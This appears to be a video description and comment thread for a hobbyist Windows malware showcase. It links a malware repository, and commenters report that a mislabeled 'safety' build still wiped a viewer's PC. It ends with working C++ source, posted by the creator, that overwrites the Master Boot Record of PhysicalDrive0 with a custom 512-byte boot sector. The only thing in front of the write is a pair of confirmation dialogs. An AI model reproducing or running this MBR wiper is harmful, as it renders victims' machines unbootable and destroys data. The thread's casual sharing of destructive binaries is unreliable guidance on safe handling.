Link: github.com/WinMalware/Cozoamogen.exe/tree/main Used Program: OBS Studio And VMWare Workstation Pro Used Code editor: Visual Code Studio 2015 (REMINDER:USE FIXED MBR ONE BECAUSE THE .EXE ONE HAS BUG ON MBR AND MBR DIDNT FUNTCION CORRECTLY USE FIXED MBR ONE)
Im the second count for my coment and yes my pc has destroyed by the safery corazogen now my pc is good bit i can open someting papa but my pc is good A cuestion Do you fix the problem? I you fixed thanks and i going to download the safery
@@TM_DS Follow step Step 1:Open explorer Step 2:Go to This pc Step 3:Select C:\ then right click at it Step 4:Go to Properties Step 5:Then Press "Disk Cleanup" Step 6: if you are in disk cleanup page now click "Clean up System files" then wait for it to complete Step 7:If completed then it will bring up disk cleanup window again Step 8: select all file Step 9:Press ok Step 10: Waiting to it complete if completed you are fine But if these step doesn't work Then it must be a VMware virtual harddisk that boot up VMs Then if you have D:\ Recommend to move Virtual machine to D:\ or do the following step in VMware Step 1:In vmware go edit then head to Preferences Step 2:In preferences page now head to "Default location for virtual Machines" there will be an browse press it Step 3:If you press it it will bring up the "Browse for Folder" Step 4:Go to Data trying find the D:\ if you found then click at D:\ then click "Make New Folder" for example i will name it as Virtual machine if done then select it and press ok and now default location will be the VMs that Virtual machine file will created in D:\ if there any issues please tell me
Link:
github.com/WinMalware/Cozoamogen.exe/tree/main
Used Program:
OBS Studio And VMWare Workstation Pro
Used Code editor:
Visual Code Studio 2015
(REMINDER:USE FIXED MBR ONE BECAUSE THE .EXE ONE HAS BUG ON MBR AND MBR DIDNT FUNTCION CORRECTLY USE FIXED MBR ONE)
you forgot to remove the destructive code in safety version
0:43 sounds like xcf
4:45 looks like ys314359e0
2:13 tif last payload bytebeat beats of the ACID.EXE MALWARE
dude, that’s Holzer
Thanks for the safery version
The safery destroy my pc😭😭😭 i can use
HOW???
@@Juganditux sorry... i will adjust the code
Im the second count for my coment and yes my pc has destroyed by the safery corazogen now my pc is good bit i can open someting papa but my pc is good
A cuestion
Do you fix the problem?
I you fixed thanks and i going to download the safery
3:14 sounds like isopropoxide
Discord link:
discord.com/invite/3F3dtrfM
3:44 making this to my first payload of my malware (retro.exe)
Well im gonna test it and upload it but my monitor is not working it just said (Power saving mode)
@@hafsakashif2347 don't test safety i didn't remove destruction code
@@Win_malware im doin on vm
@@hafsakashif2347Aurum
0:12 sounds like jwzyexgnlc
1:13 sounds like tryaleartsenic
Update Done.
Can u make ColorCs.exe safety?
ColorCs was made in C#
@@nazar7346 oh
create malware that has the theme of do not take this cat please


I want to try your malware but my disk is full.
just Delete junk files that you dont use
@@Win_malware I have deleted junk and unnecessary files. But the disk is still full.
@@TM_DS Follow step
Step 1:Open explorer
Step 2:Go to This pc
Step 3:Select C:\ then right click at it
Step 4:Go to Properties
Step 5:Then Press "Disk Cleanup"
Step 6: if you are in disk cleanup page now click "Clean up System files" then wait for it to complete
Step 7:If completed then it will bring up disk cleanup window again
Step 8: select all file
Step 9:Press ok
Step 10: Waiting to it complete if completed you are fine
But if these step doesn't work Then it must be a VMware virtual harddisk that boot up VMs Then if you have
D:\ Recommend to move Virtual machine to D:\ or do the following step in VMware
Step 1:In vmware go edit then head to Preferences
Step 2:In preferences page now head to "Default location for virtual Machines" there will be an browse press it
Step 3:If you press it it will bring up the "Browse for Folder"
Step 4:Go to Data trying find the D:\ if you found then click at D:\ then click "Make New Folder" for example i will name it as Virtual machine if done then select it and press ok and now default location will be the VMs that Virtual machine file will created in D:\ if there any issues please tell me
@@Win_malware
Oh thank you
Hey winmalware
ColorCs_GDIOnly.exe
do you overwrite mbr? how does that work lol
Include the Bootheader (Which Formed as Array)
Here the begin of MBR Overwrites
//This loads the MBR Header However this is APM.exe MBR
#include
#include
//#include
//#include
//#include
#pragma comment(lib, "winmm.lib")
#pragma comment(lib,"Msimg32.lib")
const unsigned char MasterBootRecord[] = { 0x0E, 0x1F, 0x0E, 0x07, 0x31, 0xDB, 0xB8, 0x00, 0x3F, 0xBF, 0x04, 0x7E, 0xB9, 0x00, 0x09, 0xF3,
0xAA, 0x88, 0x87, 0x04, 0x7E, 0x88, 0xA7, 0xC4, 0x7E, 0x88, 0x87, 0x85, 0x7F, 0x88, 0xA7, 0x45,
0x80, 0x88, 0x87, 0x05, 0x81, 0x88, 0xA7, 0xC5, 0x81, 0x88, 0x87, 0x86, 0x82, 0x88, 0xA7, 0x46,
0x83, 0x88, 0x87, 0x06, 0x84, 0x88, 0xA7, 0xC6, 0x84, 0x88, 0x87, 0x84, 0x85, 0x88, 0xA7, 0x44,
0x86, 0xFE, 0xCC, 0xFE, 0xC0, 0x83, 0xC3, 0x03, 0x81, 0xFB, 0xC0, 0x00, 0x7C, 0xC3, 0xB9, 0x00,
0x01, 0x9B, 0xDB, 0xE3, 0xD9, 0x06, 0x47, 0x7D, 0xDE, 0x0E, 0x4D, 0x7D, 0xD9, 0xFE, 0xDD, 0xD9,
0xD9, 0xE8, 0xD8, 0xC1, 0xDE, 0x0E, 0x4B, 0x7D, 0xDF, 0x1D, 0x47, 0xFF, 0x06, 0x4D, 0x7D, 0xE2,
0xE3, 0xB8, 0x13, 0x00, 0xCD, 0x10, 0xFA, 0xBA, 0xC4, 0x03, 0xB8, 0x04, 0x06, 0xEF, 0xB8, 0x02,
0x0F, 0xEF, 0x83, 0xC2, 0x10, 0xB8, 0x14, 0x00, 0xEF, 0xB8, 0x17, 0xE3, 0xEF, 0xB0, 0x09, 0xEE,
0x42, 0xEC, 0x24, 0xE0, 0x04, 0x07, 0xEE, 0xFB, 0xB9, 0x00, 0x01, 0xBA, 0x04, 0x7E, 0xE8, 0x90,
0x00, 0x68, 0x00, 0xA0, 0x07, 0xBA, 0xDA, 0x03, 0xEC, 0x24, 0x08, 0x75, 0xFB, 0xEC, 0x24, 0x08,
0x74, 0xFB, 0x31, 0xED, 0xA1, 0x41, 0x7D, 0xA3, 0x00, 0x7E, 0xB5, 0x32, 0xA1, 0x43, 0x7D, 0xA3,
0x02, 0x7E, 0xB1, 0x50, 0xBE, 0x00, 0x7E, 0xBB, 0x04, 0x87, 0xB4, 0x00, 0xB2, 0x04, 0xAC, 0xD7,
0x00, 0xC4, 0xFE, 0xCA, 0x75, 0xF8, 0x26, 0x88, 0x66, 0x00, 0x45, 0xFE, 0x06, 0x02, 0x7E, 0x80,
0x06, 0x03, 0x7E, 0x03, 0xFE, 0xC9, 0x75, 0xDC, 0x80, 0x06, 0x00, 0x7E, 0x02, 0xFE, 0x06, 0x01,
0x7E, 0xFE, 0xCD, 0x75, 0xC7, 0x80, 0x06, 0x41, 0x7D, 0x01, 0x80, 0x2E, 0x42, 0x7D, 0x02, 0x80,
0x06, 0x43, 0x7D, 0x03, 0x80, 0x2E, 0x44, 0x7D, 0x04, 0xE4, 0x60, 0xFE, 0xC8, 0x75, 0x96, 0x51,
0x52, 0x8B, 0x16, 0x45, 0x7D, 0x81, 0xC2, 0x00, 0x03, 0x81, 0xFA, 0x04, 0x84, 0x7E, 0x03, 0xBA,
0x04, 0x7E, 0x89, 0x16, 0x45, 0x7D, 0xB9, 0x00, 0x01, 0xE8, 0x05, 0x00, 0x5A, 0x59, 0xE9, 0x74,
0xFF, 0x06, 0x50, 0x53, 0x0E, 0x07, 0xB8, 0x12, 0x10, 0x31, 0xDB, 0xCD, 0x10, 0x5B, 0x58, 0x07,
0xC3, 0x00, 0x00, 0x00, 0x00, 0x04, 0x7E, 0xDC, 0x0F, 0xC9, 0x3C, 0x1E, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
};
DWORD WINAPI MBRWiper(LPVOID lpParam) {
DWORD dwBytesWritten;
HANDLE hDevice = CreateFileW(
L"\\\\.\\PhysicalDrive0", GENERIC_ALL,
FILE_SHARE_READ | FILE_SHARE_WRITE, 0,
OPEN_EXISTING, 0, 0);
WriteFile(hDevice, MasterBootRecord, 512, &dwBytesWritten, 0);
return 1;
}
int CALLBACK WinMain(
HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow
)
{
if (MessageBoxW(NULL, L"Overwrite MBR?.", L"DO NOT RUN ON REAL PC!", MB_YESNO | MB_ICONEXCLAMATION) == IDNO)
{
ExitProcess(0);
}
else
{
if (MessageBoxW(NULL, L"Are you sure?", L"LAST WARNING!", MB_YESNO | MB_ICONEXCLAMATION) == IDNO)
{
ExitProcess(0);
}
else
{
CreateThread(0, 0, MBRWiper, 0, 0, 0);
}
}
}